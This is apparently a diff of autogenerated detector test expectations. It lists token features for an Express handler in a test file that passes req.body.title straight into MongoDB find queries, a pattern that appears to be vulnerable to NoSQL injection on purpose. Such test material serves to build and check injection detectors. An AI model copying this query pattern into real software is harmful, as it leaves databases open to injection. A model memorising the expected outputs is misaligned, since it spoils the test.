autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:11:28 | MongoClient | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:11:28 | MongoClient | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:11:28 | MongoClient | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:11:29 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:11:29 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:11:29 | query | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:11:29 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:11:29 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:11:29 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:11:29 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:11:29 | req | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:11:29 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:11:29 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:35:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:35:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:35:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:35:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:35:1 | 'arguments' object of anonymous function | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:35:1 | (req, r ... });\\n} | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:35:1 | (req, r ... });\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:35:1 | (req, r ... });\\n} | calleeImports | express | @@ -1486,11 +7934,128 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:35:1 | (req, r ... });\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:35:1 | (req, r ... });\\n} | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:35:1 | (req, r ... });\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:35:1 | exceptional return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:35:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:35:1 | exceptional return of anonymous function | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:35:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:35:1 | exceptional return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:35:1 | return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:35:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:35:1 | return of anonymous function | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:35:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:35:1 | return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:30:11:32 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:30:11:32 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:30:11:32 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:30:11:32 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:30:11:32 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:30:11:32 | req | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:30:11:32 | req | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:30:11:32 | req | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:30:11:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:30:11:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:30:11:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:30:11:32 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:30:11:32 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:35:11:37 | res | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:35:11:37 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:35:11:37 | res | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:35:11:37 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:35:11:37 | res | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:12:11:12:15 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:12:11:12:15 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:12:11:12:15 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:12:11:12:15 | query | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:12:11:12:15 | query | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:12:11:12:15 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:12:11:12:15 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:12:11:12:15 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:12:11:12:20 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:12:11:12:20 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:12:11:12:20 | query | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:12:11:12:20 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:12:11:12:20 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:12:11:12:20 | query = {} | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:12:11:12:20 | query = {} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:12:11:12:20 | query = {} | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:12:11:12:20 | query = {} | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:12:11:12:20 | query = {} | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:12:19:12:20 | {} | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:12:19:12:20 | {} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:12:19:12:20 | {} | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:12:19:12:20 | {} | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:12:19:12:20 | {} | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:5:13:9 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:5:13:9 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:5:13:9 | query | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:5:13:9 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:5:13:9 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:5:13:15 | query.title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:5:13:15 | query.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:5:13:15 | query.title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:5:13:15 | query.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:5:13:15 | query.title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:5:13:32 | query.t ... y.title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:5:13:32 | query.t ... y.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:5:13:32 | query.t ... y.title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:5:13:32 | query.t ... y.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:5:13:32 | query.t ... y.title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:11:13:15 | title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:11:13:15 | title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:11:13:15 | title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:11:13:15 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:11:13:15 | title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:19:13:21 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:19:13:21 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:19:13:21 | req | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:19:13:21 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:19:13:21 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:19:13:26 | req.body | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:19:13:26 | req.body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:19:13:26 | req.body | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:19:13:26 | req.body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:19:13:26 | req.body | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:19:13:32 | req.body.title | assignedToPropName | title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:19:13:32 | req.body.title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:19:13:32 | req.body.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:19:13:32 | req.body.title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:19:13:32 | req.body.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:19:13:32 | req.body.title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:23:13:26 | body | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:23:13:26 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:23:13:26 | body | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:23:13:26 | body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:23:13:26 | body | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:28:13:32 | title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:28:13:32 | title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:28:13:32 | title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:28:13:32 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:13:28:13:32 | title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:5:14:15 | MongoClient | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:5:14:15 | MongoClient | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:5:14:15 | MongoClient | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:5:14:15 | MongoClient | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:5:14:15 | MongoClient | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:5:14:23 | MongoClient.connect | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:5:14:23 | MongoClient.connect | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:5:14:23 | MongoClient.connect | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:5:14:23 | MongoClient.connect | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:5:14:23 | MongoClient.connect | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:5:34:6 | MongoCl ... \\n }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:5:34:6 | MongoCl ... \\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:5:34:6 | MongoCl ... \\n }) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:5:34:6 | MongoCl ... \\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:5:34:6 | MongoCl ... \\n }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:5:34:6 | exceptional return of MongoCl ... \\n }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:5:34:6 | exceptional return of MongoCl ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:5:34:6 | exceptional return of MongoCl ... \\n }) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:5:34:6 | exceptional return of MongoCl ... \\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:5:34:6 | exceptional return of MongoCl ... \\n }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:17:14:23 | connect | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:17:14:23 | connect | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:17:14:23 | connect | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:17:14:23 | connect | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:17:14:23 | connect | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:25:14:56 | 'mongod ... 7/test' | CalleeFlexibleAccessPath | MongoClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:25:14:56 | 'mongod ... 7/test' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:25:14:56 | 'mongod ... 7/test' | calleeImports | mongodb | @@ -1500,6 +8065,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:25:14:56 | 'mongod ... 7/test' | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:25:14:56 | 'mongod ... 7/test' | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:25:14:56 | 'mongod ... 7/test' | receiverName | MongoClient | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:14:58 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:14:58 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:14:58 | query | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:14:58 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:14:58 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:14:58 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:14:58 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:14:58 | req | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:14:58 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:14:58 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:34:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:34:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:34:5 | 'arguments' object of anonymous function | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:34:5 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:34:5 | 'arguments' object of anonymous function | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:34:5 | (err, d ... }\\n } | CalleeFlexibleAccessPath | MongoClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:34:5 | (err, d ... }\\n } | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:34:5 | (err, d ... }\\n } | calleeImports | mongodb | @@ -1509,6 +8089,71 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:34:5 | (err, d ... }\\n } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:34:5 | (err, d ... }\\n } | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:34:5 | (err, d ... }\\n } | receiverName | MongoClient | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:34:5 | exceptional return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:34:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:34:5 | exceptional return of anonymous function | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:34:5 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:34:5 | exceptional return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:34:5 | return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:34:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:34:5 | return of anonymous function | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:34:5 | return of 